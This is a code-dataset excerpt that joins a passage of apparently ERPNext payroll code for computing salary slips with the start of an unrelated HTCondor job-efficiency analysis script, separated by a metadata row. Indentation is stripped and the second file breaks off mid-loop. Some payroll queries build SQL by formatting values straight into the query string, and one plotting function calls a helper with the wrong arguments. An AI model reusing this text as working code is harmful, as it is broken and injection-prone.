for key in ('earnings', 'deductions'):
for struct_row in self._salary_structure_doc.get(key):
amount = self.eval_condition_and_formula(struct_row, data)
if amount and struct_row.statistical_component == 0:
self.update_component_row(struct_row, amount, key)
if key=="earnings" and struct_row.is_flexible_benefit == 1:
self.add_employee_flexi_benefits(struct_row)
additional_components = get_additional_salary_component(self.employee, self.start_date, self.end_date)
if additional_components:
for additional_component in additional_components:
additional_component = frappe._dict(additional_component)
amount = additional_component.amount
overwrite = additional_component.overwrite
key = "earnings"
if additional_component.type == "Deduction":
key = "deductions"
self.update_component_row(frappe._dict(additional_component.struct_row), amount, key, overwrite=overwrite)
self.get_last_payroll_period_benefit()
# Calculate variable_based_on_taxable_salary after all components updated in salary slip
for struct_row in self._salary_structure_doc.get("deductions"):
if struct_row.variable_based_on_taxable_salary == 1 and not struct_row.formula and not struct_row.amount:
tax_detail = self.calculate_variable_based_on_taxable_salary(struct_row.salary_component)
if tax_detail and tax_detail[1]:
self.update_component_row(frappe._dict(tax_detail[0]), tax_detail[1], "deductions", tax_detail[2], tax_detail[3])
def get_last_payroll_period_benefit(self):
payroll_period = get_payroll_period(self.start_date, self.end_date, self.company)
if payroll_period:
# Check for last payroll period
if (getdate(payroll_period.end_date) <= getdate(self.end_date)):
current_flexi_amount = 0
for d in self.get("earnings"):
if d.is_flexible_benefit == 1:
current_flexi_amount += d.amount
last_benefits = get_last_payroll_period_benefits(self.employee, self.start_date, self.end_date,\
current_flexi_amount, payroll_period, self._salary_structure_doc)
if last_benefits:
for last_benefit in last_benefits:
last_benefit = frappe._dict(last_benefit)
amount = last_benefit.amount
self.update_component_row(frappe._dict(last_benefit.struct_row), amount, "earnings")
def add_employee_flexi_benefits(self, struct_row):
if frappe.db.get_value("Salary Component", struct_row.salary_component, "pay_against_benefit_claim") != 1:
benefit_component_amount = get_benefit_component_amount(self.employee, self.start_date, self.end_date, \
struct_row, self._salary_structure_doc, self.total_working_days, self.payroll_frequency)
if benefit_component_amount:
self.update_component_row(struct_row, benefit_component_amount, "earnings")
else:
benefit_claim_amount = get_benefit_claim_amount(self.employee, self.start_date, self.end_date, struct_row.salary_component)
if benefit_claim_amount:
self.update_component_row(struct_row, benefit_claim_amount, "earnings")
def update_component_row(self, struct_row, amount, key, benefit_tax=None, additional_tax=None, overwrite=1):
component_row = None
for d in self.get(key):
if d.salary_component == struct_row.salary_component:
component_row = d
if not component_row:
self.append(key, {
'amount': amount,
'default_amount': amount,
'depends_on_lwp' : struct_row.depends_on_lwp,
'salary_component' : struct_row.salary_component,
'abbr' : struct_row.abbr,
'do_not_include_in_total' : struct_row.do_not_include_in_total,
'is_tax_applicable': struct_row.is_tax_applicable,
'is_flexible_benefit': struct_row.is_flexible_benefit,
'variable_based_on_taxable_salary': struct_row.variable_based_on_taxable_salary,
'is_additional_component': struct_row.is_additional_component,
'tax_on_flexible_benefit': benefit_tax,
'tax_on_additional_salary': additional_tax
})
else:
if overwrite:
component_row.default_amount = amount
component_row.amount = amount
else:
component_row.default_amount += amount
component_row.amount = component_row.default_amount
component_row.tax_on_flexible_benefit = benefit_tax
component_row.tax_on_additional_salary = additional_tax
def eval_condition_and_formula(self, d, data):
try:
condition = d.condition.strip() if d.condition else None
if condition:
if not frappe.safe_eval(condition, self.whitelisted_globals, data):
return None
amount = d.amount
if d.amount_based_on_formula:
formula = d.formula.strip() if d.formula else None
if formula:
amount = frappe.safe_eval(formula, self.whitelisted_globals, data)
if amount:
data[d.abbr] = amount
return amount
except NameError as err:
frappe.throw(_("Name error: {0}".format(err)))
except SyntaxError as err:
frappe.throw(_("Syntax error in formula or condition: {0}".format(err)))
except Exception as e:
frappe.throw(_("Error in formula or condition: {0}".format(e)))
raise
def get_data_for_eval(self):
'''Returns data for evaluating formula'''
data = frappe._dict()
data.update(frappe.get_doc("Salary Structure Assignment",
{"employee": self.employee, "salary_structure": self.salary_structure}).as_dict())
data.update(frappe.get_doc("Employee", self.employee).as_dict())
data.update(self.as_dict())
# set values for components
salary_components = frappe.get_all("Salary Component", fields=["salary_component_abbr"])
for sc in salary_components:
data.setdefault(sc.salary_component_abbr, 0)
for key in ('earnings', 'deductions'):
for d in self.get(key):
data[d.abbr] = d.amount
return data
def get_emp_and_leave_details(self):
'''First time, load all the components from salary structure'''
if self.employee:
self.set("earnings", [])
self.set("deductions", [])
if not self.salary_slip_based_on_timesheet:
self.get_date_details()
self.validate_dates()
joining_date, relieving_date = frappe.db.get_value("Employee", self.employee,
["date_of_joining", "relieving_date"])
self.get_leave_details(joining_date, relieving_date)
struct = self.check_sal_struct(joining_date, relieving_date)
if struct:
self._salary_structure_doc = frappe.get_doc('Salary Structure', struct)
self.salary_slip_based_on_timesheet = self._salary_structure_doc.salary_slip_based_on_timesheet or 0
self.set_time_sheet()
self.pull_sal_struct()
def set_time_sheet(self):
if self.salary_slip_based_on_timesheet:
self.set("timesheets", [])
timesheets = frappe.db.sql(""" select * from `tabTimesheet` where employee = %(employee)s and start_date BETWEEN %(start_date)s AND %(end_date)s and (status = 'Submitted' or
status = 'Billed')""", {'employee': self.employee, 'start_date': self.start_date, 'end_date': self.end_date}, as_dict=1)
for data in timesheets:
self.append('timesheets', {
'time_sheet': data.name,
'working_hours': data.total_hours
})
def get_date_details(self):
if not self.end_date:
date_details = get_start_end_dates(self.payroll_frequency, self.start_date or self.posting_date)
self.start_date = date_details.start_date
self.end_date = date_details.end_date
def check_sal_struct(self, joining_date, relieving_date):
cond = """and sa.employee=%(employee)s and (sa.from_date <= %(start_date)s or
sa.from_date <= %(end_date)s or sa.from_date <= %(joining_date)s)"""
if self.payroll_frequency:
cond += """and ss.payroll_frequency = '%(payroll_frequency)s'""" % {"payroll_frequency": self.payroll_frequency}
st_name = frappe.db.sql("""
select sa.salary_structure
from `tabSalary Structure Assignment` sa join `tabSalary Structure` ss
where sa.salary_structure=ss.name
and sa.docstatus = 1 and ss.docstatus = 1 and ss.is_active ='Yes' %s
order by sa.from_date desc
limit 1
""" %cond, {'employee': self.employee, 'start_date': self.start_date,
'end_date': self.end_date, 'joining_date': joining_date})
if st_name:
self.salary_structure = st_name[0][0]
return self.salary_structure
else:
self.salary_structure = None
frappe.msgprint(_("No active or default Salary Structure found for employee {0} for the given dates")
.format(self.employee), title=_('Salary Structure Missing'))
def pull_sal_struct(self):
from erpnext.hr.doctype.salary_structure.salary_structure import make_salary_slip
if self.salary_slip_based_on_timesheet:
self.salary_structure = self._salary_structure_doc.name
self.hour_rate = self._salary_structure_doc.hour_rate
self.total_working_hours = sum([d.working_hours or 0.0 for d in self.timesheets]) or 0.0
wages_amount = self.hour_rate * self.total_working_hours
self.add_earning_for_hourly_wages(self, self._salary_structure_doc.salary_component, wages_amount)
make_salary_slip(self._salary_structure_doc.name, self)
def process_salary_structure(self):
'''Calculate salary after salary structure details have been updated'''
if not self.salary_slip_based_on_timesheet:
self.get_date_details()
self.pull_emp_details()
self.get_leave_details()
self.calculate_net_pay()
def add_earning_for_hourly_wages(self, doc, salary_component, amount):
row_exists = False
for row in doc.earnings:
if row.salary_component == salary_component:
row.amount = amount
row_exists = True
break
if not row_exists:
wages_row = {
"salary_component": salary_component,
"abbr": frappe.db.get_value("Salary Component", salary_component, "salary_component_abbr"),
"amount": self.hour_rate * self.total_working_hours
}
doc.append('earnings', wages_row)
def pull_emp_details(self):
emp = frappe.db.get_value("Employee", self.employee, ["bank_name", "bank_ac_no"], as_dict=1)
if emp:
self.bank_name = emp.bank_name
self.bank_account_no = emp.bank_ac_no
def get_leave_details(self, joining_date=None, relieving_date=None, lwp=None):
if not joining_date:
joining_date, relieving_date = frappe.db.get_value("Employee", self.employee,
["date_of_joining", "relieving_date"])
holidays = self.get_holidays_for_employee(self.start_date, self.end_date)
working_days = date_diff(self.end_date, self.start_date) + 1
actual_lwp = self.calculate_lwp(holidays, working_days)
if not cint(frappe.db.get_value("HR Settings", None, "include_holidays_in_total_working_days")):
working_days -= len(holidays)
if working_days < 0:
frappe.throw(_("There are more holidays than working days this month."))
if not lwp:
lwp = actual_lwp
elif lwp != actual_lwp:
frappe.msgprint(_("Leave Without Pay does not match with approved Leave Application records"))
self.total_working_days = working_days
self.leave_without_pay = lwp
payment_days = flt(self.get_payment_days(joining_date, relieving_date)) - flt(lwp)
self.payment_days = payment_days > 0 and payment_days or 0
def get_payment_days(self, joining_date, relieving_date):
start_date = getdate(self.start_date)
if joining_date:
if getdate(self.start_date) <= joining_date <= getdate(self.end_date):
start_date = joining_date
elif joining_date > getdate(self.end_date):
return
end_date = getdate(self.end_date)
if relieving_date:
if getdate(self.start_date) <= relieving_date <= getdate(self.end_date):
end_date = relieving_date
elif relieving_date < getdate(self.start_date):
frappe.throw(_("Employee relieved on {0} must be set as 'Left'")
.format(relieving_date))
payment_days = date_diff(end_date, start_date) + 1
if not cint(frappe.db.get_value("HR Settings", None, "include_holidays_in_total_working_days")):
holidays = self.get_holidays_for_employee(start_date, end_date)
payment_days -= len(holidays)
return payment_days
def get_holidays_for_employee(self, start_date, end_date):
holiday_list = get_holiday_list_for_employee(self.employee)
holidays = frappe.db.sql_list('''select holiday_date from `tabHoliday`
where
parent=%(holiday_list)s
and holiday_date >= %(start_date)s
and holiday_date <= %(end_date)s''', {
"holiday_list": holiday_list,
"start_date": start_date,
"end_date": end_date
})
holidays = [cstr(i) for i in holidays]
return holidays
def calculate_lwp(self, holidays, working_days):
lwp = 0
holidays = "','".join(holidays)
for d in range(working_days):
dt = add_days(cstr(getdate(self.start_date)), d)
leave = frappe.db.sql("""
select t1.name, t1.half_day
from `tabLeave Application` t1, `tabLeave Type` t2
where t2.name = t1.leave_type
and t2.is_lwp = 1
and t1.docstatus = 1
and t1.employee = %(employee)s
and CASE WHEN t2.include_holiday != 1 THEN %(dt)s not in ('{0}') and %(dt)s between from_date and to_date and ifnull(t1.salary_slip, '') = ''
WHEN t2.include_holiday THEN %(dt)s between from_date and to_date and ifnull(t1.salary_slip, '') = ''
END
""".format(holidays), {"employee": self.employee, "dt": dt})
if leave:
lwp = cint(leave[0][1]) and (lwp + 0.5) or (lwp + 1)
return lwp
def check_existing(self):
if not self.salary_slip_based_on_timesheet:
ret_exist = frappe.db.sql("""select name from `tabSalary Slip`
where start_date = %s and end_date = %s and docstatus != 2
and employee = %s and name != %s""",
(self.start_date, self.end_date, self.employee, self.name))
if ret_exist:
self.employee = ''
frappe.throw(_("Salary Slip of employee {0} already created for this period").format(self.employee))
else:
for data in self.timesheets:
if frappe.db.get_value('Timesheet', data.time_sheet, 'status') == 'Payrolled':
frappe.throw(_("Salary Slip of employee {0} already created for time sheet {1}").format(self.employee, data.time_sheet))
def sum_components(self, component_type, total_field, precision):
joining_date, relieving_date = frappe.db.get_value("Employee", self.employee,
["date_of_joining", "relieving_date"])
if not relieving_date:
relieving_date = getdate(self.end_date)
if not joining_date:
frappe.throw(_("Please set the Date Of Joining for employee {0}").format(frappe.bold(self.employee_name)))
for d in self.get(component_type):
if (self.salary_structure and
cint(d.depends_on_lwp) and
(not
self.salary_slip_based_on_timesheet or
getdate(self.start_date) < joining_date or
getdate(self.end_date) > relieving_date
)):
d.amount = rounded(
(flt(d.default_amount, precision) * flt(self.payment_days)
/ cint(self.total_working_days)), self.precision("amount", component_type)
)
elif not self.payment_days and not self.salary_slip_based_on_timesheet and \
cint(d.depends_on_lwp):
d.amount = 0
elif not d.amount:
d.amount = d.default_amount
if not d.do_not_include_in_total:
self.set(total_field, self.get(total_field) + flt(d.amount, precision))
def calculate_net_pay(self):
if self.salary_structure:
self.calculate_component_amounts()
disable_rounded_total = cint(frappe.db.get_value("Global Defaults", None, "disable_rounded_total"))
precision = frappe.defaults.get_global_default("currency_precision")
self.total_deduction = 0
self.gross_pay = 0
self.sum_components('earnings', 'gross_pay', precision)
self.sum_components('deductions', 'total_deduction', precision)
self.set_loan_repayment()
self.net_pay = flt(self.gross_pay) - (flt(self.total_deduction) + flt(self.total_loan_repayment))
self.rounded_total = rounded(self.net_pay,
self.precision("net_pay") if disable_rounded_total else 0)
if self.net_pay < 0:
frappe.throw(_("Net Pay cannnot be negative"))
def set_loan_repayment(self):
self.set('loans', [])
self.total_loan_repayment = 0
self.total_interest_amount = 0
self.total_principal_amount = 0
for loan in self.get_loan_details():
self.append('loans', {
'loan': loan.name,
'total_payment': loan.total_payment,
'interest_amount': loan.interest_amount,
'principal_amount': loan.principal_amount,
'loan_account': loan.loan_account,
'interest_income_account': loan.interest_income_account
})
self.total_loan_repayment += loan.total_payment
self.total_interest_amount += loan.interest_amount
self.total_principal_amount += loan.principal_amount
def get_loan_details(self):
return frappe.db.sql("""select rps.principal_amount, rps.interest_amount, l.name,
rps.total_payment, l.loan_account, l.interest_income_account
from
`tabRepayment Schedule` as rps, `tabLoan` as l
where
l.name = rps.parent and rps.payment_date between %s and %s and
l.repay_from_salary = 1 and l.docstatus = 1 and l.applicant = %s""",
(self.start_date, self.end_date, self.employee), as_dict=True) or []
def on_submit(self):
if self.net_pay < 0:
frappe.throw(_("Net Pay cannot be less than 0"))
else:
self.set_status()
self.update_status(self.name)
self.update_salary_slip_in_additional_salary()
if (frappe.db.get_single_value("HR Settings", "email_salary_slip_to_employee")) and not frappe.flags.via_payroll_entry:
self.email_salary_slip()
def on_cancel(self):
self.set_status()
self.update_status()
self.update_salary_slip_in_additional_salary()
def on_trash(self):
from frappe.model.naming import revert_series_if_last
revert_series_if_last(self.series, self.name)
def update_salary_slip_in_additional_salary(self):
salary_slip = self.name if self.docstatus==1 else None
frappe.db.sql("""
update `tabAdditional Salary` set salary_slip=%s
where employee=%s and payroll_date between %s and %s and docstatus=1
""", (salary_slip, self.employee, self.start_date, self.end_date))
def email_salary_slip(self):
receiver = frappe.db.get_value("Employee", self.employee, "prefered_email")
if receiver:
email_args = {
"recipients": [receiver],
"message": _("Please see attachment"),
"subject": 'Salary Slip - from {0} to {1}'.format(self.start_date, self.end_date),
"attachments": [frappe.attach_print(self.doctype, self.name, file_name=self.name)],
"reference_doctype": self.doctype,
"reference_name": self.name
}
if not frappe.flags.in_test:
enqueue(method=frappe.sendmail, queue='short', timeout=300, is_async=True, **email_args)
else:
frappe.sendmail(**email_args)
else:
msgprint(_("{0}: Employee email not found, hence email not sent").format(self.employee_name))
def update_status(self, salary_slip=None):
for data in self.timesheets:
if data.time_sheet:
timesheet = frappe.get_doc('Timesheet', data.time_sheet)
timesheet.salary_slip = salary_slip
timesheet.flags.ignore_validate_update_after_submit = True
timesheet.set_status()
timesheet.save()
def set_status(self, status=None):
'''Get and update status'''
if not status:
status = self.get_status()
self.db_set("status", status)
def get_status(self):
if self.docstatus == 0:
status = "Draft"
elif self.docstatus == 1:
status = "Submitted"
elif self.docstatus == 2:
status = "Cancelled"
return status
def calculate_variable_based_on_taxable_salary(self, tax_component):
payroll_period = get_payroll_period(self.start_date, self.end_date, self.company)
if not payroll_period:
frappe.msgprint(_("Start and end dates not in a valid Payroll Period, cannot calculate {0}.")
.format(tax_component))
return False
if payroll_period.end_date <= getdate(self.end_date):
if not self.deduct_tax_for_unsubmitted_tax_exemption_proof or not\
self.deduct_tax_for_unclaimed_employee_benefits:
frappe.throw(_("You have to Deduct Tax for Unsubmitted Tax Exemption Proof and Unclaimed \
Employee Benefits in the last Salary Slip of Payroll Period"))
# calc prorata tax to be applied
return self.calculate_variable_tax(tax_component, payroll_period)
def calculate_variable_tax(self, tax_component, payroll_period):
annual_taxable_earning, period_factor = 0, 0
pro_rata_tax_paid, additional_tax_paid, benefit_tax_paid = 0, 0, 0
unclaimed_earning, unclaimed_benefit, additional_income = 0, 0, 0
# get taxable_earning, additional_income in this slip
taxable_earning = self.get_taxable_earnings()
if self.deduct_tax_for_unclaimed_employee_benefits:
# get all untaxed benefits till date, pass amount to be taxed by later methods
unclaimed_benefit = self.calculate_unclaimed_taxable_benefit(payroll_period)
# flexi's excluded from monthly tax, add flexis in this slip to unclaimed_benefit
unclaimed_benefit += self.get_taxable_earnings(only_flexi=True)["taxable_earning"]
if self.deduct_tax_for_unsubmitted_tax_exemption_proof:
# do not consider exemption, calc tax to be paid for the period till date
# considering prorata taxes paid and proofs submitted
unclaimed_earning = self.calculate_unclaimed_taxable_earning(payroll_period, tax_component)
earning_in_period = taxable_earning["taxable_earning"] + unclaimed_earning
period_factor = self.get_period_factor(payroll_period.start_date, payroll_period.end_date,
payroll_period.start_date, self.end_date)
annual_taxable_earning = earning_in_period * period_factor
additional_income += self.get_total_additional_income(payroll_period.start_date)
else:
# consider exemption declaration, find annual_earning by monthly taxable salary
period_factor = self.get_period_factor(payroll_period.start_date, payroll_period.end_date)
annual_earning = taxable_earning["taxable_earning"] * period_factor
exemption_amount = 0
if frappe.db.exists("Employee Tax Exemption Declaration", {"employee": self.employee,
"payroll_period": payroll_period.name, "docstatus": 1}):
exemption_amount = frappe.db.get_value("Employee Tax Exemption Declaration",
{"employee": self.employee, "payroll_period": payroll_period.name, "docstatus": 1},
"total_exemption_amount")
annual_taxable_earning = annual_earning - exemption_amount
if self.deduct_tax_for_unclaimed_employee_benefits or self.deduct_tax_for_unsubmitted_tax_exemption_proof:
tax_detail = self.get_tax_paid_in_period(payroll_period, tax_component)
if tax_detail:
pro_rata_tax_paid = tax_detail["total_tax_paid"] - tax_detail["additional_tax"] - tax_detail["benefit_tax"]
additional_tax_paid = tax_detail["additional_tax"]
benefit_tax_paid = tax_detail["benefit_tax"]
# add any additional income in this slip
additional_income += taxable_earning["additional_income"]
args = {"payroll_period": payroll_period.name, "tax_component": tax_component,
"annual_taxable_earning": annual_taxable_earning, "period_factor": period_factor,
"unclaimed_benefit": unclaimed_benefit, "additional_income": additional_income,
"pro_rata_tax_paid": pro_rata_tax_paid, "benefit_tax_paid": benefit_tax_paid,
"additional_tax_paid": additional_tax_paid}
return self.calculate_tax(args)
def calculate_unclaimed_taxable_benefit(self, payroll_period):
total_benefit, total_benefit_claim = 0, 0
# get total sum of benefits paid
sum_benefit = frappe.db.sql("""select sum(sd.amount) from `tabSalary Detail` sd join
`tabSalary Slip` ss on sd.parent=ss.name where sd.parentfield='earnings'
and sd.is_tax_applicable=1 and is_flexible_benefit=1 and ss.docstatus=1
and ss.employee='{0}' and ss.start_date between '{1}' and '{2}' and
ss.end_date between '{1}' and '{2}'""".format(self.employee,
payroll_period.start_date, self.start_date))
if sum_benefit and sum_benefit[0][0]:
total_benefit = sum_benefit[0][0]
# get total benefits claimed
sum_benefit_claim = frappe.db.sql("""select sum(claimed_amount) from
`tabEmployee Benefit Claim` where docstatus=1 and employee='{0}' and claim_date
between '{1}' and '{2}'""".format(self.employee, payroll_period.start_date, self.end_date))
if sum_benefit_claim and sum_benefit_claim[0][0]:
total_benefit_claim = sum_benefit_claim[0][0]
return total_benefit - total_benefit_claim
def calculate_unclaimed_taxable_earning(self, payroll_period, tax_component):
total_taxable_earning, total_exemption_amount = 0, 0
# calc total taxable amount in period
sum_taxable_earning = frappe.db.sql("""select sum(sd.amount) from `tabSalary Detail` sd join
`tabSalary Slip` ss on sd.parent=ss.name where sd.parentfield='earnings'
and sd.is_tax_applicable=1 and is_additional_component=0 and is_flexible_benefit=0
and ss.docstatus=1 and ss.employee='{0}' and ss.start_date between '{1}' and '{2}'
and ss.end_date between '{1}' and '{2}'""".format(self.employee,
payroll_period.start_date, self.start_date))
if sum_taxable_earning and sum_taxable_earning[0][0]:
total_taxable_earning = sum_taxable_earning[0][0]
# add up total Proof Submission
sum_exemption = frappe.db.sql("""select sum(exemption_amount) from
`tabEmployee Tax Exemption Proof Submission` where docstatus=1 and employee='{0}' and
payroll_period='{1}' and submission_date between '{2}' and '{3}'""".format(self.employee,
payroll_period.name, payroll_period.start_date, self.end_date))
if sum_exemption and sum_exemption[0][0]:
total_exemption_amount = sum_exemption[0][0]
total_taxable_earning -= total_exemption_amount
return total_taxable_earning
def get_total_additional_income(self, from_date):
total_additional_pay = 0
sum_additional_earning = frappe.db.sql("""select sum(sd.amount) from `tabSalary Detail` sd join
`tabSalary Slip` ss on sd.parent=ss.name where sd.parentfield='earnings'
and sd.is_tax_applicable=1 and is_additional_component=1 and is_flexible_benefit=0
and ss.docstatus=1 and ss.employee='{0}' and ss.start_date between '{1}' and '{2}'
and ss.end_date between '{1}' and '{2}'""".format(self.employee,
from_date, self.start_date))
if sum_additional_earning and sum_additional_earning[0][0]:
total_additional_pay = sum_additional_earning[0][0]
return total_additional_pay
def get_tax_paid_in_period(self, payroll_period, tax_component, only_total=False):
# find total_tax_paid, tax paid for benefit, additional_salary
sum_tax_paid = frappe.db.sql("""select sum(sd.amount), sum(tax_on_flexible_benefit),
sum(tax_on_additional_salary) from `tabSalary Detail` sd join `tabSalary Slip`
ss on sd.parent=ss.name where sd.parentfield='deductions' and sd.salary_component='{3}'
and sd.variable_based_on_taxable_salary=1 and ss.docstatus=1 and ss.employee='{0}'
and ss.start_date between '{1}' and '{2}' and ss.end_date between '{1}' and
'{2}'""".format(self.employee, payroll_period.start_date, self.start_date, tax_component))
if sum_tax_paid and sum_tax_paid[0][0]:
return {'total_tax_paid': sum_tax_paid[0][0], 'benefit_tax':sum_tax_paid[0][1], 'additional_tax': sum_tax_paid[0][2]}
def get_taxable_earnings(self, include_flexi=0, only_flexi=0):
taxable_earning = 0
additional_income = 0
for earning in self.earnings:
if earning.is_tax_applicable:
if earning.is_additional_component:
additional_income += earning.amount
continue
if only_flexi:
if earning.is_tax_applicable and earning.is_flexible_benefit:
taxable_earning += earning.amount
continue
if include_flexi:
if earning.is_tax_applicable or (earning.is_tax_applicable and earning.is_flexible_benefit):
taxable_earning += earning.amount
else:
if earning.is_tax_applicable and not earning.is_flexible_benefit:
taxable_earning += earning.amount
return {"taxable_earning": taxable_earning, "additional_income": additional_income}
def calculate_tax(self, args):
tax_amount, benefit_tax, additional_tax = 0, 0, 0
annual_taxable_earning = args.get("annual_taxable_earning")
benefit_to_tax = args.get("unclaimed_benefit")
additional_income = args.get("additional_income")
# Get tax calc by period
annual_tax = self.calculate_tax_by_tax_slab(args.get("payroll_period"), annual_taxable_earning)
# Calc prorata tax
tax_amount = annual_tax / args.get("period_factor")
# Benefit is a part of Salary Structure, add the tax diff, update annual_tax
if benefit_to_tax > 0:
annual_taxable_earning += benefit_to_tax
annual_tax_with_benefit_income = self.calculate_tax_by_tax_slab(
args.get("payroll_period"), annual_taxable_earning)
benefit_tax = annual_tax_with_benefit_income - annual_tax - args.get("benefit_tax_paid")
tax_amount += benefit_tax
annual_tax = annual_tax_with_benefit_income
# find the annual tax diff caused by additional_income, add to tax_amount
if additional_income > 0:
annual_tax_with_additional_income = self.calculate_tax_by_tax_slab(
args.get("payroll_period"), annual_taxable_earning + additional_income)
additional_tax = annual_tax_with_additional_income - annual_tax - args.get("additional_tax_paid")
tax_amount += additional_tax
# less paid taxes
if args.get("pro_rata_tax_paid"):
tax_amount -= args.get("pro_rata_tax_paid")
struct_row = self.get_salary_slip_row(args.get("tax_component"))
return [struct_row, tax_amount, benefit_tax, additional_tax]
def calculate_tax_by_tax_slab(self, payroll_period, annual_earning):
payroll_period_obj = frappe.get_doc("Payroll Period", payroll_period)
data = self.get_data_for_eval()
taxable_amount = 0
for slab in payroll_period_obj.taxable_salary_slabs:
if slab.condition and not self.eval_tax_slab_condition(slab.condition, data):
continue
if not slab.to_amount and annual_earning > slab.from_amount:
taxable_amount += (annual_earning - slab.from_amount) * slab.percent_deduction *.01
continue
if annual_earning > slab.from_amount and annual_earning < slab.to_amount:
taxable_amount += (annual_earning - slab.from_amount) * slab.percent_deduction *.01
elif annual_earning > slab.from_amount and annual_earning > slab.to_amount:
taxable_amount += (slab.to_amount - slab.from_amount) * slab.percent_deduction * .01
return taxable_amount
def eval_tax_slab_condition(self, condition, data):
try:
condition = condition.strip()
if condition:
return frappe.safe_eval(condition, self.whitelisted_globals, data)
except NameError as err:
frappe.throw(_("Name error: {0}".format(err)))
except SyntaxError as err:
frappe.throw(_("Syntax error in condition: {0}".format(err)))
except Exception as e:
frappe.throw(_("Error in formula or condition: {0}".format(e)))
raise
def get_period_factor(self, period_start, period_end, start_date=None, end_date=None):
# TODO if both deduct checked update the factor to make tax consistent
payroll_days = date_diff(period_end, period_start) + 1
if start_date and end_date:
salary_days = date_diff(end_date, start_date) + 1
return flt(payroll_days)/flt(salary_days)
# if period configured for a year and monthly frequency return 12 to make tax calc consistent
if 360 <= payroll_days <= 370 and self.payroll_frequency == "Monthly":
return 12
salary_days = date_diff(self.end_date, self.start_date) + 1
return flt(payroll_days)/flt(salary_days)
def get_salary_slip_row(self, salary_component):
component = frappe.get_doc("Salary Component", salary_component)
# Data for update_component_row
struct_row = {}
struct_row['depends_on_lwp'] = component.depends_on_lwp
struct_row['salary_component'] = component.name
struct_row['abbr'] = component.salary_component_abbr
struct_row['do_not_include_in_total'] = component.do_not_include_in_total
struct_row['is_tax_applicable'] = component.is_tax_applicable
struct_row['is_flexible_benefit'] = component.is_flexible_benefit
struct_row['variable_based_on_taxable_salary'] = component.variable_based_on_taxable_salary
return struct_row
def unlink_ref_doc_from_salary_slip(ref_no):
linked_ss = frappe.db.sql_list("""select name from `tabSalary Slip`
where journal_entry=%s and docstatus < 2""", (ref_no))
if linked_ss:
for ss in linked_ss:
ss_doc = frappe.get_doc("Salary Slip", ss)
frappe.db.set_value("Salary Slip", ss_doc.name, "journal_entry", "")
|
gpl-3.0
| 4,243,228,669,414,350,300
| 42.415212
| 176
| 0.711881
| false
| 2.979293
| false
| false
| false
|
SISC2014/JobAnalysis
|
MongoRetrieval/src/EfficiencyHistogram.py
|
1
|
6076
|
'''
Created on Jun 19, 2014
@author: Erik Halperin
List of Keys
_id
JobStartDate
Requirements
TransferInput
TotalSuspensions
LastJobStatus
BufferBlockSize
OrigMaxHosts
RequestMemory
WantRemoteSyscalls
LastHoldReasonCode
ExitStatus
Args
JobFinishedHookDone
JobCurrentStartDate
CompletionDate
JobLeaseDuration
Err
RemoteWallClockTime
JobUniverse
RequestCpus
RemoveReason
StreamErr
Rank
WantRemoteIO
LocalSysCpu
UsedOCWrapper
CumulativeSlotTime
TransferIn
MachineAttrCpus0
CondorPlatform
CurrentTime
ExitReason
StreamOut
WantCheckpoint
GlobalJobId
TransferInputSizeMB
JobStatus
LastPublicClaimId
MemoryUsage
NumSystemHolds
TransferOutput
PeriodicRemove
NumShadowStarts
LastHoldReasonSubCode
LastSuspensionTime
ShouldTransferFiles
QDate
RemoteSysCpu
ImageSize_RAW
LastRemoteHost
CondorVersion
DiskUsage_RAW
PeriodicRelease
NumCkpts_RAW
JobCurrentStartExecutingDate
ProjectName
CoreSize
RemoteUserCpu
BytesSent
Owner
BytesRecvd
ExitCode
NumJobStarts
ExecutableSize_RAW
Notification
ExecutableSize
Environment
StartdPrincipal
RootDir
MinHosts
CumulativeSuspensionTime
JOBGLIDEIN_ResourceName
ProcId
MATCH_EXP_JOBGLIDEIN_ResourceName
OnExitRemove
User
UserLog
CommittedSuspensionTime
NumRestarts
JobCoreDumped
Cmd
NumJobMatches
DiskUsage
LastRemotePool
CommittedSlotTime
ResidentSetSize
WhenToTransferOutput
ExitBySignal
Out
RequestDisk
ImageSize
NumCkpts
LastJobLeaseRenewal
MachineAttrSlotWeight0
ResidentSetSize_RAW
JobPrio
JobRunCount
PeriodicHold
ClusterId
NiceUser
MyType
LocalUserCpu
BufferSize
LastHoldReason
CurrentHosts
LeaveJobInQueue
OnExitHold
EnteredCurrentStatus
MaxHosts
CommittedTime
LastMatchTime
In
JobNotification
'''
import re
import matplotlib.pyplot as plt
from pymongo import MongoClient
#takes a list of dictionaries and returns a list of floats
def parseList(l):
l = map(str, l)
newlist = []
for k in l:
newlist.append(re.sub('[RemoteWallClockTimeUsrpu_id\"\'{}: ]', '', k))
newlist = map(float, newlist)
return list(newlist)
#returns a list of dictionaries
#item is from list of keys, username: "example@login01.osgconnect.net", cluster: "123456", site: "phys.ucconn.edu",
#coll: MongoDB collection
#username/cluster/site may be None, in which case they will not be used
#item should be _id
def dbFindItemFromUser(item, username, cluster, site, coll):
mylist = []
rgx = "$regex"
if(username != None):
username = '\"' + username + '\"'
dicU = {'User': username }
else:
dicU = {}
if(cluster != None):
dicC = { 'ClusterId': cluster }
else:
dicC = {}
if(site != None):
dicS = { 'LastRemoteHost': { rgx: site } }
else:
dicS = {}
dicU.update(dicC)
dicU.update(dicS)
pr = { item: 1, '_id': 0 }
for condor_history in coll.find(dicU, pr):
mylist.append(condor_history)
return mylist
#returns a list of dictionaries
#username and coll are same as above
def dbFindIdFromUser(username, coll):
mylist = []
username = '\"' + username + '\"'
cr = { 'User': username }
pr = { '_id': 1 }
for condor_history in coll.find(cr, pr):
mylist.append(condor_history)
return mylist
#creates a scatterplot of two items
def plotScatter(item1, item2, username, cluster, coll, xlab, ylab, title):
lst1 = parseList(dbFindItemFromUser(item1, username, cluster, coll))
lst2 = parseList(dbFindItemFromUser(item2, username, cluster, coll))
plt.plot(lst1, lst2, 'bo')
plt.xlabel(xlab)
plt.ylabel(ylab)
plt.title(title)
plt.show()
#creates a histogram of a list
#l: list to plot, bs: number of bins
def plotHist(l, bs, xlab, ylab, title):
plt.hist(l, bins=bs)
plt.title(title)
plt.xlabel(xlab)
plt.ylabel(ylab)
plt.show()
def getEfficiency(username, cluster, site, coll):
ruc = parseList(dbFindItemFromUser("RemoteUserCpu", username, cluster, site, coll))
rwct = parseList(dbFindItemFromUser("RemoteWallClockTime", username, cluster, site, coll))
efflist = []
totcount = 0
goodcount = 0 #certain efficiency values are >1 due to a condor error. these values are discarded
zerocount = 0 #testing possible condor bug where RemoteUserCpu is 0 but RemoteWallClockTime is quite large
for x,y in zip(ruc, rwct):
if(y == 0):
totcount += 1
elif(x/y > 1):
totcount += 1
else:
